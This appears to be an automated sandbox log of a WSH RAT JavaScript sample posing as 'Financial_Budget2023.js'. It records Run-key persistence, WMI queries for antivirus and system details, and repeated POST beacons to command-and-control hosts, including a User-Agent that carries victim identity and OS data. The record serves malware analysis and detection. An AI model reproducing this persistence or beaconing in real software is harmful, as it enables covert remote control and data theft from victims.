reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
wmi select * from antivirusproduct
wmi select * from win32_operatingsystem
wmi select * from win32_logicaldisk
Time & API Arguments Status Return Repeated

InternetCrackUrlW

 url: http://jemyy.theworkpc.com:5401/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

send

 buffer: !
socket: 1000
sent: 1
1 1 0

InternetCrackUrlW

 url: http://jemyy.theworkpc.com:5401/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

send

 buffer: !
socket: 1000
sent: 1
1 1 0

InternetCrackUrlW

 url: http://jemyy.theworkpc.com:5401/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

send

 buffer: !
socket: 1000
sent: 1
1 1 0

InternetCrackUrlW

 url: http://jemyy.theworkpc.com:5401/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

send

 buffer: !
socket: 1000
sent: 1
1 1 0

InternetCrackUrlW

 url: http://jemyy.theworkpc.com:5401/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

send

 buffer: !
socket: 1000
sent: 1
1 1 0

InternetCrackUrlW

 url: http://jemyy.theworkpc.com:5401/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

send

 buffer: !
socket: 1000
sent: 1
1 1 0

InternetCrackUrlW

 url: http://jemyy.theworkpc.com:5401/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

send

 buffer: !
socket: 1000
sent: 1
1 1 0

InternetCrackUrlW

 url: http://jemyy.theworkpc.com:5401/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

send

 buffer: !
socket: 1000
sent: 1
1 1 0

InternetCrackUrlW

 url: http://jemyy.theworkpc.com:5401/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

send

 buffer: !
socket: 1000
sent: 1
1 1 0

InternetCrackUrlW

 url: http://jemyy.theworkpc.com:5401/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

send

 buffer: !
socket: 1000
sent: 1
1 1 0

InternetCrackUrlW

 url: http://jemyy.theworkpc.com:5401/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

send

 buffer: !
socket: 1000
sent: 1
1 1 0

InternetCrackUrlW

 url: http://jemyy.theworkpc.com:5401/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

send

 buffer: !
socket: 1000
sent: 1
1 1 0

InternetCrackUrlW

 url: http://jemyy.theworkpc.com:5401/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

send

 buffer: !
socket: 1000
sent: 1
1 1 0

InternetCrackUrlW

 url: http://139.177.146.165:4848/is-ready
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

send

 buffer: !
socket: 1096
sent: 1
1 1 0

send

 buffer: POST /is-ready HTTP/1.1 Accept: */* Accept-Language: ko User-Agent: WSHRAT|7C6024AD|TEST22-PC|test22|Microsoft Windows 7 Professional KN |plus|nan-av|false - 12/7/2023|JavaScript Accept-Encoding: gzip, deflate Host: 139.177.146.165:4848 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
socket: 1156
sent: 313
1 313 0

send

 buffer: !
socket: 1096
sent: 1
1 1 0

InternetCrackUrlW

 url: http://139.177.146.165:4848/is-ready
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

send

 buffer: !
socket: 1096
sent: 1
1 1 0

send

 buffer: POST /is-ready HTTP/1.1 Accept: */* Accept-Language: ko User-Agent: WSHRAT|7C6024AD|TEST22-PC|test22|Microsoft Windows 7 Professional KN |plus|nan-av|false - 12/7/2023|JavaScript Accept-Encoding: gzip, deflate Host: 139.177.146.165:4848 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
socket: 1176
sent: 313
1 313 0

send

 buffer: !
socket: 1096
sent: 1
1 1 0

InternetCrackUrlW

 url: http://139.177.146.165:4848/is-ready
flags: 0
1 1 0
parent_process wscript.exe martian_process "C:\Windows\System32\wscript.exe" //B "C:\Users\test22\AppData\Roaming\zYSMEAvCwn.js"
parent_process wscript.exe martian_process wscript //B "C:\Users\test22\AppData\Roaming\zYSMEAvCwn.js"
parent_process wscript.exe martian_process "C:\Windows\System32\wscript.exe" //B "C:\Users\test22\AppData\Roaming\zYSMEAvCwn.js"
parent_process wscript.exe martian_process "C:\Windows\System32\wscript.exe" //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
parent_process wscript.exe martian_process wscript //B "C:\Users\test22\AppData\Roaming\zYSMEAvCwn.js"
parent_process wscript.exe martian_process wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
file C:\Windows\SysWOW64\wscript.exe
dead_host 192.168.56.101:49171
dead_host 192.168.56.101:49192
dead_host 192.168.56.101:49211
dead_host 192.168.56.101:49175
dead_host 192.168.56.101:49196
dead_host 192.168.56.101:49193
dead_host 192.168.56.101:49203
dead_host 192.168.56.101:49188
dead_host 192.168.56.101:49166
dead_host 192.168.56.101:49197
dead_host 192.168.56.101:49207
dead_host 192.168.56.101:49177
dead_host 192.168.56.101:49208
dead_host 192.168.56.101:49185
dead_host 192.168.56.101:49181
dead_host 192.168.56.101:49189
dead_host 192.168.56.101:49167
dead_host 192.168.56.101:49200
dead_host 192.168.56.101:49178
dead_host 192.168.56.101:49186
dead_host 192.168.56.101:49204
dead_host 109.248.144.235:5401
dead_host 192.168.56.101:49182
dead_host 192.168.56.101:49170
dead_host 192.168.56.101:49199
dead_host 192.168.56.101:49210
dead_host 192.168.56.101:49174